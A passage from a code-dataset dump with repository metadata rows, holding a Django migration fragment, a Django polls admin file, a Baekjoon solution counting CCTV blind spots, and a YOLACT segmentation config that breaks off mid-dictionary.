            model_name='album',
            name='artist',
            field=models.CharField(help_text='Enter your artist name here', max_length=100),
        ),
    ]
| [
"emryzs01@gmail.com"
] | emryzs01@gmail.com |
18d6aa3fe977892dc48a2e42cd5f541eae5f092c | b66f24ec89be100b7a4cf74e3fad56315f75f57d | /polls/admin.py | b39b2f47084517685074659d36d71b68873bea86 | [] | no_license | lmyfzx/DjangoTest | e619a192a490f73c7922f7005a27daa839522a92 | 8a1f12a9d6bc6fcb5bbe37df8fcf89e9730e0c60 | refs/heads/master | 2020-12-03T23:49:54.371017 | 2016-09-23T08:57:35 | 2016-09-23T08:57:35 | 66,942,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | from django.contrib import admin
# Register your models here.
from .models import Question,Choice
class ChoiceInline(admin.TabularInline):
    """Edit Choice rows inline on the Question admin page."""
    model = Choice
    # Number of blank extra choice rows shown.
    extra = 2
class QuestionAdmin(admin.ModelAdmin):
    """Admin configuration for Question, with inline choice editing."""
    fieldsets = [
        (None, {'fields': ['question_text']}),
        ('日期信息', {'fields': ['pub_date']}),
    ]
    inlines = [ChoiceInline]
    list_display = ('question_text', 'pub_date', 'was_published_recently')
    list_filter = ['pub_date']
    search_fields = ['question_text']
admin.site.register(Question,QuestionAdmin) | [
"lmyfzx@qq.com"
] | lmyfzx@qq.com |
1f3f19f03def5c7a6c1e1e2eb72b4fa33bdf7c50 | 6b5572557c4a0785c4b727ee024790ec066ad6f2 | /Baekjoon/삼성 SW 역량 테스트 기출 문제/감시.py | 17577c83e70a00bb1a4e4811333b625744615101 | [] | no_license | easternpillar/AlgorithmTraining | 5be38998dc062d1d02933f61eaca3265e1b73981 | c8f05eda86161a7dbacab99154be1af292e7db8a | refs/heads/master | 2023-04-29T11:13:34.984005 | 2023-04-08T07:12:29 | 2023-04-08T07:12:29 | 231,875,419 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,986 | py | # Problem:
# Given the structure of office, return the minimum number of blind spots.
# My Solution:
from collections import deque
import copy
def camera1(o, pos):
    """Type-1 CCTV: four candidate views, one per single direction.

    For each of up/down/left/right, walk from pos until a wall (6) or the
    border, marking empty cells (0) with '#'.  Returns the four deep-copied
    grids; the input grid is never modified.
    """
    views = []
    for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):
        grid = copy.deepcopy(o)
        r, c = pos[0], pos[1]
        while 0 <= r + dr < len(grid) and 0 <= c + dc < len(grid[0]):
            r += dr
            c += dc
            if grid[r][c] == 6:
                break
            if grid[r][c] == 0:
                grid[r][c] = '#'
        views.append(grid)
    return views
def camera2(o, pos):
    """Type-2 CCTV: two candidate views, each watching a pair of opposite
    directions (vertical, then horizontal).  Walls (6) block sight; empty
    cells (0) are marked '#'.  The input grid is never modified.
    """
    views = []
    for axis in (((-1, 0), (1, 0)), ((0, -1), (0, 1))):
        grid = copy.deepcopy(o)
        for dr, dc in axis:
            r, c = pos[0], pos[1]
            while 0 <= r + dr < len(grid) and 0 <= c + dc < len(grid[0]):
                r += dr
                c += dc
                if grid[r][c] == 6:
                    break
                if grid[r][c] == 0:
                    grid[r][c] = '#'
        views.append(grid)
    return views
def camera3(o, pos):
    """Type-3 CCTV: four L-shaped candidate views, each watching two
    perpendicular directions.  Walls (6) block sight; empty cells (0) are
    marked '#'.  The input grid is never modified.
    """
    combos = (
        ((-1, 0), (0, 1)),   # up + right
        ((1, 0), (0, 1)),    # down + right
        ((0, -1), (-1, 0)),  # left + up
        ((0, -1), (1, 0)),   # left + down
    )
    views = []
    for pair in combos:
        grid = copy.deepcopy(o)
        for dr, dc in pair:
            r, c = pos[0], pos[1]
            while 0 <= r + dr < len(grid) and 0 <= c + dc < len(grid[0]):
                r += dr
                c += dc
                if grid[r][c] == 6:
                    break
                if grid[r][c] == 0:
                    grid[r][c] = '#'
        views.append(grid)
    return views
def camera4(o, pos):
    """Return the coverage variants for a type-4 camera (T-shape).

    o   -- office grid: 0 = empty, 6 = wall, 1-5 = camera types.
    pos -- [row, col] position of the camera.

    A type-4 camera watches three directions at once; the four rotations
    give four variants. Each variant is a deep copy of ``o`` with every
    watched empty cell set to '#'. The input grid is not modified.
    """
    def _beam(grid, dr, dc):
        # Mark empty cells from ``pos`` along direction (dr, dc) until a
        # wall (6) or the grid edge. Cameras (1-5) do not block the view.
        r, c = pos
        while 0 <= r + dr < len(grid) and 0 <= c + dc < len(grid[0]):
            r += dr
            c += dc
            if grid[r][c] == 6:
                break
            if grid[r][c] == 0:
                grid[r][c] = '#'

    results = []
    # Rotations in the original order:
    # (up, left, right), (down, left, right),
    # (left, down, up), (right, up, down).
    for directions in ([(-1, 0), (0, -1), (0, 1)],
                       [(1, 0), (0, -1), (0, 1)],
                       [(0, -1), (1, 0), (-1, 0)],
                       [(0, 1), (-1, 0), (1, 0)]):
        variant = copy.deepcopy(o)
        for dr, dc in directions:
            _beam(variant, dr, dc)
        results.append(variant)
    return results
def camera5(o, pos):
    """Return the coverage grid for a type-5 camera (all four directions).

    o   -- office grid: 0 = empty, 6 = wall, 1-5 = camera types.
    pos -- [row, col] position of the camera.

    A type-5 camera watches up, down, left and right simultaneously, so it
    has a single rotation; unlike camera1-camera4 this returns one grid,
    not a list. The returned grid is a deep copy of ``o`` with every
    watched empty cell set to '#'. The input grid is not modified.
    """
    def _beam(grid, dr, dc):
        # Mark empty cells from ``pos`` along direction (dr, dc) until a
        # wall (6) or the grid edge. Cameras (1-5) do not block the view.
        r, c = pos
        while 0 <= r + dr < len(grid) and 0 <= c + dc < len(grid[0]):
            r += dr
            c += dc
            if grid[r][c] == 6:
                break
            if grid[r][c] == 0:
                grid[r][c] = '#'

    watched = copy.deepcopy(o)
    for dr, dc in ((-1, 0), (0, -1), (0, 1), (1, 0)):
        _beam(watched, dr, dc)
    return watched
# Driver: enumerate every combination of camera rotations and report the
# minimum number of blind spots (empty cells not watched by any camera).
# r, c: number of rows / columns of the office grid.
r, c = map(int, input().split())
# Grid values: 0 = empty, 1-5 = camera types, 6 = wall.
office = [list(map(int, list(input().split()))) for _ in range(r)]
# origin: count of empty cells before any camera coverage is applied;
# this is the answer when the office contains no camera at all.
origin=0
for i in range(len(office)):
    for j in range(len(office[i])):
        if office[i][j]==0:
            origin+=1
# offices: every grid configuration generated so far (one entry per
# combination of rotations of the cameras processed up to this point).
offices = deque([office])
# cam: positions of all cameras, consumed one at a time below.
cam = deque()
for i in range(r):
    for j in range(c):
        if 1 <= office[i][j] <= 5:
            cam.append([i, j])
answer=set()
while cam:
    # NOTE(review): this rebinds `c` (the column count) to a camera
    # position; the column count is not needed again past this point.
    c = cam.popleft()
    x, y = c[0], c[1]
    new_office = []
    # Expand each existing configuration with every rotation of the
    # current camera (camera1-4 return a list; camera5 a single grid).
    while offices:
        o = offices.popleft()
        if o[x][y] == 1:
            new_office.extend(camera1(o, [x, y]))
        elif o[x][y] == 2:
            new_office.extend(camera2(o, [x, y]))
        elif o[x][y] == 3:
            new_office.extend(camera3(o, [x, y]))
        elif o[x][y] == 4:
            new_office.extend(camera4(o, [x, y]))
        else:
            new_office.append(camera5(o, [x, y]))
    offices.extend(new_office)
    if not cam:
        # Last camera processed: count the remaining '0' cells (blind
        # spots) in every final configuration.
        while offices:
            temp=offices.popleft()
            cnt=0
            for i in range(len(temp)):
                for j in range(len(temp[i])):
                    if temp[i][j]==0:
                        cnt+=1
            answer.add(cnt)
        # Redundant (the outer loop would exit anyway) but harmless.
        break
if answer:
    print(min(answer))
else:
    # No cameras in the grid: every empty cell remains unwatched.
    print(origin)
"roh941129@gmail.com"
] | roh941129@gmail.com |
9b16e0d0632a907a965a739e5db1e58f79447655 | f5bd0ef83daf74264c096ad0570142fd97ac1548 | /data/config.py | 9aac56412c8a78e334b7676529945550693ccb03 | [
"MIT"
] | permissive | SHIVAM3052/Yolact | 67ee667486314d78a3533bc175977eabd86612b3 | 2802a8ee4f6036a2c85d0f348766307e55c910a2 | refs/heads/main | 2023-07-28T10:15:29.919702 | 2021-09-08T15:36:44 | 2021-09-08T15:36:44 | 404,216,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49,855 | py | from backbone import ResNetBackbone, VGGBackbone, ResNetBackboneGN, DarkNetBackbone
from math import sqrt
import torch
# for making bounding boxes pretty
# Per-detection display colours, cycled through when drawing boxes/masks.
COLORS = ((244, 67, 54),
          (233, 30, 99),
          (156, 39, 176),
          (103, 58, 183),
          ( 63, 81, 181),
          ( 33, 150, 243),
          (  3, 169, 244),
          (  0, 188, 212),
          (  0, 150, 136),
          ( 76, 175, 80),
          (139, 195, 74),
          (205, 220, 57),
          (255, 235, 59),
          (255, 193, 7),
          (255, 152, 0),
          (255, 87, 34),
          (121, 85, 72),
          (158, 158, 158),
          ( 96, 125, 139))

# These are in BGR and are for ImageNet
# Channel-wise mean / std used by the input transforms below.
MEANS = (103.94, 116.78, 123.68)
STD = (57.38, 57.12, 58.40)

# The 80 COCO category names, in contiguous (1-indexed) order.
COCO_CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
                'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
                'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
                'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
                'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
                'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
                'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
                'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
                'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
                'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
                'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
                'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven',
                'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',
                'scissors', 'teddy bear', 'hair drier', 'toothbrush')

# Maps a (non-contiguous) COCO annotation category_id to the 1-indexed
# position of the class in COCO_CLASSES above.
COCO_LABEL_MAP = { 1:  1,  2:  2,  3:  3,  4:  4,  5:  5,  6:  6,  7:  7,  8:  8,
                   9:  9, 10: 10, 11: 11, 13: 12, 14: 13, 15: 14, 16: 15, 17: 16,
                  18: 17, 19: 18, 20: 19, 21: 20, 22: 21, 23: 22, 24: 23, 25: 24,
                  27: 25, 28: 26, 31: 27, 32: 28, 33: 29, 34: 30, 35: 31, 36: 32,
                  37: 33, 38: 34, 39: 35, 40: 36, 41: 37, 42: 38, 43: 39, 44: 40,
                  46: 41, 47: 42, 48: 43, 49: 44, 50: 45, 51: 46, 52: 47, 53: 48,
                  54: 49, 55: 50, 56: 51, 57: 52, 58: 53, 59: 54, 60: 55, 61: 56,
                  62: 57, 63: 58, 64: 59, 65: 60, 67: 61, 70: 62, 72: 63, 73: 64,
                  74: 65, 75: 66, 76: 67, 77: 68, 78: 69, 79: 70, 80: 71, 81: 72,
                  82: 73, 84: 74, 85: 75, 86: 76, 87: 77, 88: 78, 89: 79, 90: 80}
# ----------------------- CONFIG CLASS ----------------------- #
class Config(object):
    """
    Holds the configuration for anything you want it to.
    To get the currently active config, call get_cfg().

    To use, just do cfg.x instead of cfg['x'].
    I made this because doing cfg['x'] all the time is dumb.
    """

    def __init__(self, config_dict):
        # Expose every dict entry as an attribute for cfg.x style access.
        for key, val in config_dict.items():
            self.__setattr__(key, val)

    def copy(self, new_config_dict=None):
        """
        Copies this config into a new config object, making
        the changes given by new_config_dict (a plain dict).
        """
        ret = Config(vars(self))

        # Fix: the default used to be a mutable `{}` argument (a classic
        # Python pitfall); `None` behaves identically for callers.
        if new_config_dict is not None:
            for key, val in new_config_dict.items():
                ret.__setattr__(key, val)

        return ret

    def replace(self, new_config_dict):
        """
        Copies new_config_dict into this config object.
        Note: new_config_dict can also be a config object.
        """
        if isinstance(new_config_dict, Config):
            new_config_dict = vars(new_config_dict)

        for key, val in new_config_dict.items():
            self.__setattr__(key, val)

    def print(self):
        # Dump every setting as "key = value", one per line.
        for k, v in vars(self).items():
            print(k, ' = ', v)
# ----------------------- DATASETS ----------------------- #
# Each dataset config derives from dataset_base via Config.copy(), so it
# only needs to list the keys it overrides.

dataset_base = Config({
    'name': 'Base Dataset',

    # Training images and annotations
    'train_images': './data/coco/images/',
    'train_info': 'path_to_annotation_file',

    # Validation images and annotations.
    'valid_images': './data/coco/images/',
    'valid_info': 'path_to_annotation_file',

    # Whether or not to load GT. If this is False, eval.py quantitative evaluation won't work.
    'has_gt': True,

    # A list of names for each of you classes.
    'class_names': COCO_CLASSES,

    # COCO class ids aren't sequential, so this is a bandage fix. If your ids aren't sequential,
    # provide a map from category_id -> index in class_names + 1 (the +1 is there because it's 1-indexed).
    # If not specified, this just assumes category ids start at 1 and increase sequentially.
    'label_map': None
})

coco2014_dataset = dataset_base.copy({
    'name': 'COCO 2014',

    'train_info': './data/coco/annotations/instances_train2014.json',
    'valid_info': './data/coco/annotations/instances_val2014.json',

    'label_map': COCO_LABEL_MAP
})

coco2017_dataset = dataset_base.copy({
    'name': 'COCO 2017',

    'train_info': './data/coco/annotations/instances_train2017.json',
    'valid_info': './data/coco/annotations/instances_val2017.json',

    'label_map': COCO_LABEL_MAP
})

coco2017_testdev_dataset = dataset_base.copy({
    'name': 'COCO 2017 Test-Dev',

    'valid_info': './data/coco/annotations/image_info_test-dev2017.json',
    # Test-dev has no public annotations, hence no ground truth.
    'has_gt': False,

    'label_map': COCO_LABEL_MAP
})

# This should be used for the pretrained model on the whole 80 classes COCO.
coco2017_dataset_person_1 = dataset_base.copy({
    'name': 'COCO 2017 Person',
    'train_info': './data/coco/annotations/instances_train2017_person.json',
    'valid_info': './data/coco/annotations/instances_val2017_person.json',
    'label_map': COCO_LABEL_MAP
})

# This should be used for a model trained only on the person class.
coco2017_dataset_person_2 = dataset_base.copy({
    'name': 'COCO 2017 Person',
    'train_info': './data/coco/annotations/instances_train2017_person.json',
    'valid_info': './data/coco/annotations/instances_val2017_person.json',
    'class_names': ('person',)
})

ochuman_dataset = dataset_base.copy({
    'name': 'OCHuman',
    'train_info': './data/coco/annotations/ochuman_coco.json',
    'valid_info': './data/coco/annotations/instances_val2017_person.json',
    'label_map': COCO_LABEL_MAP
})

cityscapes_dataset = dataset_base.copy({
    'name': 'Cityscapes',
    'train_info': './data/cityscapes/annotations/instancesonly_filtered_gtFine_train.json',
    'valid_info': './data/cityscapes/annotations/instancesonly_filtered_gtFine_val.json',
    'train_images': './data/cityscapes/images/',
    'valid_images': './data/cityscapes/images/',
    'label_map': COCO_LABEL_MAP
})

# The 20 Pascal VOC class names, in contiguous (1-indexed) order.
PASCAL_CLASSES = ("aeroplane", "bicycle", "bird", "boat", "bottle",
                  "bus", "car", "cat", "chair", "cow", "diningtable",
                  "dog", "horse", "motorbike", "person", "pottedplant",
                  "sheep", "sofa", "train", "tvmonitor")

pascal_sbd_dataset = dataset_base.copy({
    'name': 'Pascal SBD 2012',

    'train_images': './data/sbd/img',
    'valid_images': './data/sbd/img',

    'train_info': './data/sbd/pascal_sbd_train.json',
    'valid_info': './data/sbd/pascal_sbd_val.json',

    'class_names': PASCAL_CLASSES,
})

# Single-class person dataset hosted on a mounted Google Drive
# (paths suggest this config was used from Colab).
person_dataset = dataset_base.copy({
    'name': 'Person',
    'valid_info': '/content/drive/MyDrive/Yolact_train/yolact/validation_data/val_person.json',
    'valid_images': '/content/drive/MyDrive/Yolact_train/yolact/validation_data/images/',
    'train_images': '/content/drive/MyDrive/Yolact_train/yolact/Training_data/images/',
    'train_info': '/content/drive/MyDrive/Yolact_train/yolact/Training_data/person.json',
    'has_gt': True,
    'class_names': ('person',),
    'label_map': {1: 1}
})

# Custom single-class dataset ("agfields_singleclass"), also on Drive.
shivam_dataset = dataset_base.copy({
    'name': 'agfields_singleclass',
    'valid_info': '/content/drive/MyDrive/Yolact_train/data/annotations/val2016.json',
    'valid_images': '/content/drive/MyDrive/Yolact_train/data/images/val2016/',
    'train_images': '/content/drive/MyDrive/Yolact_train/data/images/train2016/',
    'train_info': '/content/drive/MyDrive/Yolact_train/data/annotations/train2016.json',
    'has_gt': True,
    'class_names': ('agfields_singleclass',),
    'label_map': {1: 1}
})
# ----------------------- TRANSFORMS ----------------------- #
# Per-backbone input preprocessing: channel order plus exactly one of
# normalize (use MEANS/STD), subtract_means, or to_float.

resnet_transform = Config({
    'channel_order': 'RGB',
    'normalize': True,
    'subtract_means': False,
    'to_float': False,
})

vgg_transform = Config({
    # Note that though vgg is traditionally BGR,
    # the channel order of vgg_reducedfc.pth is RGB.
    'channel_order': 'RGB',
    'normalize': False,
    'subtract_means': True,
    'to_float': False,
})

darknet_transform = Config({
    'channel_order': 'RGB',
    'normalize': False,
    'subtract_means': False,
    'to_float': True,
})
# ----------------------- BACKBONES ----------------------- #
# Each backbone config names a backbone class (from backbone.py), its
# pretrained weight file, constructor args, input transform, and the
# anchor settings (scales / aspect ratios) per selected feature layer.

backbone_base = Config({
    'name': 'Base Backbone',
    'path': 'path/to/pretrained/weights',
    'type': object,
    'args': tuple(),
    'transform': resnet_transform,

    'selected_layers': list(),
    'pred_scales': list(),
    'pred_aspect_ratios': list(),

    'use_pixel_scales': False,
    'preapply_sqrt': True,
    'use_square_anchors': False,
})

resnet101_backbone = backbone_base.copy({
    'name': 'ResNet101',
    'path': 'resnet101_reducedfc.pth',
    'type': ResNetBackbone,
    'args': ([3, 4, 23, 3],),
    'transform': resnet_transform,

    'selected_layers': list(range(2, 8)),
    'pred_scales': [[1]]*6,
    'pred_aspect_ratios': [ [[0.66685089, 1.7073535, 0.87508774, 1.16524493, 0.49059086]] ] * 6,
})

resnet101_gn_backbone = backbone_base.copy({
    'name': 'ResNet101_GN',
    'path': 'R-101-GN.pkl',
    'type': ResNetBackboneGN,
    'args': ([3, 4, 23, 3],),
    'transform': resnet_transform,

    'selected_layers': list(range(2, 8)),
    'pred_scales': [[1]]*6,
    'pred_aspect_ratios': [ [[0.66685089, 1.7073535, 0.87508774, 1.16524493, 0.49059086]] ] * 6,
})

# Deformable convolutions (DCN) inserted every 3rd layer — see YOLACT++.
resnet101_dcn_inter3_backbone = resnet101_backbone.copy({
    'name': 'ResNet101_DCN_Interval3',
    'args': ([3, 4, 23, 3], [0, 4, 23, 3], 3),
})

resnet50_backbone = resnet101_backbone.copy({
    'name': 'ResNet50',
    'path': 'resnet50-19c8e357.pth',
    'type': ResNetBackbone,
    'args': ([3, 4, 6, 3],),
    'transform': resnet_transform,
})

resnet50_dcnv2_backbone = resnet50_backbone.copy({
    'name': 'ResNet50_DCNv2',
    'args': ([3, 4, 6, 3], [0, 4, 6, 3]),
})

darknet53_backbone = backbone_base.copy({
    'name': 'DarkNet53',
    'path': 'darknet53.pth',
    'type': DarkNetBackbone,
    'args': ([1, 2, 8, 8, 4],),
    'transform': darknet_transform,

    'selected_layers': list(range(3, 9)),
    'pred_scales': [[3.5, 4.95], [3.6, 4.90], [3.3, 4.02], [2.7, 3.10], [2.1, 2.37], [1.8, 1.92]],
    'pred_aspect_ratios': [ [[1, sqrt(2), 1/sqrt(2), sqrt(3), 1/sqrt(3)][:n], [1]] for n in [3, 5, 5, 5, 3, 3] ],
})

# VGG16 layer spec: 'M' is max-pool (optionally with kwargs), ints are
# conv output channel counts (optionally with kwargs).
vgg16_arch = [[64, 64],
              [ 'M', 128, 128],
              [ 'M', 256, 256, 256],
              [('M', {'kernel_size': 2, 'stride': 2, 'ceil_mode': True}), 512, 512, 512],
              [ 'M', 512, 512, 512],
              [('M', {'kernel_size': 3, 'stride': 1, 'padding': 1}),
               (1024, {'kernel_size': 3, 'padding': 6, 'dilation': 6}),
               (1024, {'kernel_size': 1})]]

vgg16_backbone = backbone_base.copy({
    'name': 'VGG16',
    'path': 'vgg16_reducedfc.pth',
    'type': VGGBackbone,
    'args': (vgg16_arch, [(256, 2), (128, 2), (128, 1), (128, 1)], [3]),
    'transform': vgg_transform,

    'selected_layers': [3] + list(range(5, 10)),
    'pred_scales': [[5, 4]]*6,
    'pred_aspect_ratios': [ [[1], [1, sqrt(2), 1/sqrt(2), sqrt(3), 1/sqrt(3)][:n]] for n in [3, 5, 5, 5, 3, 3] ],
})
# ----------------------- MASK BRANCH TYPES ----------------------- #

# Enum-like Config: selects which mask branch the model uses.
mask_type = Config({
    # Direct produces masks directly as the output of each pred module.
    # This is denoted as fc-mask in the paper.
    # Parameters: mask_size, use_gt_bboxes
    'direct': 0,

    # Lincomb produces coefficients as the output of each pred module then uses those coefficients
    # to linearly combine features from a prototype network to create image-sized masks.
    # Parameters:
    #   - masks_to_train (int): Since we're producing (near) full image masks, it'd take too much
    #                           vram to backprop on every single mask. Thus we select only a subset.
    #   - mask_proto_src (int): The input layer to the mask prototype generation network. This is an
    #                           index in backbone.layers. Use to use the image itself instead.
    #   - mask_proto_net (list<tuple>): A list of layers in the mask proto network with the last one
    #                                   being where the masks are taken from. Each conv layer is in
    #                                   the form (num_features, kernel_size, **kwdargs). An empty
    #                                   list means to use the source for prototype masks. If the
    #                                   kernel_size is negative, this creates a deconv layer instead.
    #                                   If the kernel_size is negative and the num_features is None,
    #                                   this creates a simple bilinear interpolation layer instead.
    #   - mask_proto_bias (bool): Whether to include an extra coefficient that corresponds to a proto
    #                             mask of all ones.
    #   - mask_proto_prototype_activation (func): The activation to apply to each prototype mask.
    #   - mask_proto_mask_activation (func): After summing the prototype masks with the predicted
    #                                        coeffs, what activation to apply to the final mask.
    #   - mask_proto_coeff_activation (func): The activation to apply to the mask coefficients.
    #   - mask_proto_crop (bool): If True, crop the mask with the predicted bbox during training.
    #   - mask_proto_crop_expand (float): If cropping, the percent to expand the cropping bbox by
    #                                     in each direction. This is to make the model less reliant
    #                                     on perfect bbox predictions.
    #   - mask_proto_loss (str [l1|disj]): If not None, apply an l1 or disjunctive regularization
    #                                      loss directly to the prototype masks.
    #   - mask_proto_binarize_downsampled_gt (bool): Binarize GT after dowsnampling during training?
    #   - mask_proto_normalize_mask_loss_by_sqrt_area (bool): Whether to normalize mask loss by sqrt(sum(gt))
    #   - mask_proto_reweight_mask_loss (bool): Reweight mask loss such that background is divided by
    #                                           #background and foreground is divided by #foreground.
    #   - mask_proto_grid_file (str): The path to the grid file to use with the next option.
    #                                 This should be a numpy.dump file with shape [numgrids, h, w]
    #                                 where h and w are w.r.t. the mask_proto_src convout.
    #   - mask_proto_use_grid (bool): Whether to add extra grid features to the proto_net input.
    #   - mask_proto_coeff_gate (bool): Add an extra set of sigmoided coefficients that is multiplied
    #                                   into the predicted coefficients in order to "gate" them.
    #   - mask_proto_prototypes_as_features (bool): For each prediction module, downsample the prototypes
    #                                  to the convout size of that module and supply the prototypes as input
    #                                  in addition to the already supplied backbone features.
    #   - mask_proto_prototypes_as_features_no_grad (bool): If the above is set, don't backprop gradients to
    #                                  to the prototypes from the network head.
    #   - mask_proto_remove_empty_masks (bool): Remove masks that are downsampled to 0 during loss calculations.
    #   - mask_proto_reweight_coeff (float): The coefficient to multiple the forground pixels with if reweighting.
    #   - mask_proto_coeff_diversity_loss (bool): Apply coefficient diversity loss on the coefficients so that the same
    #                                  instance has similar coefficients.
    #   - mask_proto_coeff_diversity_alpha (float): The weight to use for the coefficient diversity loss.
    #   - mask_proto_normalize_emulate_roi_pooling (bool): Normalize the mask loss to emulate roi pooling's affect on loss.
    #   - mask_proto_double_loss (bool): Whether to use the old loss in addition to any special new losses.
    #   - mask_proto_double_loss_alpha (float): The alpha to weight the above loss.
    #   - mask_proto_split_prototypes_by_head (bool): If true, this will give each prediction head its own prototypes.
    #   - mask_proto_crop_with_pred_box (bool): Whether to crop with the predicted box or the gt box.
    'lincomb': 1,
})

# ----------------------- ACTIVATION FUNCTIONS ----------------------- #

# Named activation callables referenced by the mask/coeff settings above.
activation_func = Config({
    'tanh':    torch.tanh,
    'sigmoid': torch.sigmoid,
    'softmax': lambda x: torch.nn.functional.softmax(x, dim=-1),
    'relu':    lambda x: torch.nn.functional.relu(x, inplace=True),
    'none':    lambda x: x,
})
# ----------------------- FPN DEFAULTS ----------------------- #

# Default Feature Pyramid Network settings; model configs override via copy().
fpn_base = Config({
    # The number of features to have in each FPN layer
    'num_features': 256,

    # The upsampling mode used
    'interpolation_mode': 'bilinear',

    # The number of extra layers to be produced by downsampling starting at P5
    'num_downsample': 1,

    # Whether to down sample with a 3x3 stride 2 conv layer instead of just a stride 2 selection
    'use_conv_downsample': False,

    # Whether to pad the pred layers with 1 on each side (I forgot to add this at the start)
    # This is just here for backwards compatibility
    'pad': True,

    # Whether to add relu to the downsampled layers.
    'relu_downsample_layers': False,

    # Whether to add relu to the regular layers
    'relu_pred_layers': True,
})
# ----------------------- CONFIG DEFAULTS ----------------------- #

# Master training/eval config; every model config below derives from this
# via copy() and overrides only what it needs.
coco_base_config = Config({
    'dataset': coco2014_dataset,
    'num_classes': 81, # This should include the background class
    'max_iter': 400000,

    # The maximum number of detections for evaluation
    'max_num_detections': 100,

    # dw' = momentum * dw - lr * (grad + decay * w)
    'lr': 1e-3,
    'momentum': 0.9,
    'decay': 5e-4,

    # For each lr step, what to multiply the lr with
    'gamma': 0.1,
    'lr_steps': (280000, 360000, 400000),

    # Initial learning rate to linearly warmup from (if until > 0)
    'lr_warmup_init': 1e-4,

    # If > 0 then increase the lr linearly from warmup_init to lr each iter for until iters
    'lr_warmup_until': 500,

    # The terms to scale the respective loss by
    'conf_alpha': 1,
    'bbox_alpha': 1.5,
    'mask_alpha': 0.4 / 256 * 140 * 140, # Some funky equation. Don't worry about it.

    # Eval.py sets this if you just want to run YOLACT as a detector
    'eval_mask_branch': True,

    # Top_k examples to consider for NMS
    'nms_top_k': 200,
    # Examples with confidence less than this are not considered by NMS
    'nms_conf_thresh': 0.05,
    # Boxes with IoU overlap greater than this threshold will be culled during NMS
    'nms_thresh': 0.5,

    # See mask_type for details.
    'mask_type': mask_type.direct,
    'mask_size': 16,
    'masks_to_train': 100,
    'mask_proto_src': None,
    'mask_proto_net': [(256, 3, {}), (256, 3, {})],
    'mask_proto_bias': False,
    'mask_proto_prototype_activation': activation_func.relu,
    'mask_proto_mask_activation': activation_func.sigmoid,
    'mask_proto_coeff_activation': activation_func.tanh,
    'mask_proto_crop': True,
    'mask_proto_crop_expand': 0,
    'mask_proto_loss': None,
    'mask_proto_binarize_downsampled_gt': True,
    'mask_proto_normalize_mask_loss_by_sqrt_area': False,
    'mask_proto_reweight_mask_loss': False,
    'mask_proto_grid_file': 'data/grid.npy',
    'mask_proto_use_grid': False,
    'mask_proto_coeff_gate': False,
    'mask_proto_prototypes_as_features': False,
    'mask_proto_prototypes_as_features_no_grad': False,
    'mask_proto_remove_empty_masks': False,
    'mask_proto_reweight_coeff': 1,
    'mask_proto_coeff_diversity_loss': False,
    'mask_proto_coeff_diversity_alpha': 1,
    'mask_proto_normalize_emulate_roi_pooling': False,
    'mask_proto_double_loss': False,
    'mask_proto_double_loss_alpha': 1,
    'mask_proto_split_prototypes_by_head': False,
    'mask_proto_crop_with_pred_box': False,

    # SSD data augmentation parameters
    # Randomize hue, vibrance, etc.
    'augment_photometric_distort': True,
    # Have a chance to scale down the image and pad (to emulate smaller detections)
    'augment_expand': True,
    # Potentialy sample a random crop from the image and put it in a random place
    'augment_random_sample_crop': True,
    # Mirror the image with a probability of 1/2
    'augment_random_mirror': True,
    # Flip the image vertically with a probability of 1/2
    'augment_random_flip': False,
    # With uniform probability, rotate the image [0,90,180,270] degrees
    'augment_random_rot90': False,

    # Discard detections with width and height smaller than this (in absolute width and height)
    'discard_box_width': 4 / 550,
    'discard_box_height': 4 / 550,

    # If using batchnorm anywhere in the backbone, freeze the batchnorm layer during training.
    # Note: any additional batch norm layers after the backbone will not be frozen.
    'freeze_bn': False,

    # Set this to a config object if you want an FPN (inherit from fpn_base). See fpn_base for details.
    'fpn': None,

    # Use the same weights for each network head
    'share_prediction_module': False,

    # For hard negative mining, instead of using the negatives that are leastl confidently background,
    # use negatives that are most confidently not background.
    'ohem_use_most_confident': False,

    # Use focal loss as described in https://arxiv.org/pdf/1708.02002.pdf instead of OHEM
    'use_focal_loss': False,
    'focal_loss_alpha': 0.25,
    'focal_loss_gamma': 2,

    # The initial bias toward forground objects, as specified in the focal loss paper
    'focal_loss_init_pi': 0.01,

    # Keeps track of the average number of examples for each class, and weights the loss for that class accordingly.
    'use_class_balanced_conf': False,

    # Whether to use sigmoid focal loss instead of softmax, all else being the same.
    'use_sigmoid_focal_loss': False,

    # Use class[0] to be the objectness score and class[1:] to be the softmax predicted class.
    # Note: at the moment this is only implemented if use_focal_loss is on.
    'use_objectness_score': False,

    # Adds a global pool + fc layer to the smallest selected layer that predicts the existence of each of the 80 classes.
    # This branch is only evaluated during training time and is just there for multitask learning.
    'use_class_existence_loss': False,
    'class_existence_alpha': 1,

    # Adds a 1x1 convolution directly to the biggest selected layer that predicts a semantic segmentations for each of the 80 classes.
    # This branch is only evaluated during training time and is just there for multitask learning.
    'use_semantic_segmentation_loss': False,
    'semantic_segmentation_alpha': 1,

    # Adds another branch to the netwok to predict Mask IoU.
    'use_mask_scoring': False,
    'mask_scoring_alpha': 1,

    # Match gt boxes using the Box2Pix change metric instead of the standard IoU metric.
    # Note that the threshold you set for iou_threshold should be negative with this setting on.
    'use_change_matching': False,

    # Uses the same network format as mask_proto_net, except this time it's for adding extra head layers before the final
    # prediction in prediction modules. If this is none, no extra layers will be added.
    'extra_head_net': None,

    # What params should the final head layers have (the ones that predict box, confidence, and mask coeffs)
    'head_layer_params': {'kernel_size': 3, 'padding': 1},

    # Add extra layers between the backbone and the network heads
    # The order is (bbox, conf, mask)
    'extra_layers': (0, 0, 0),

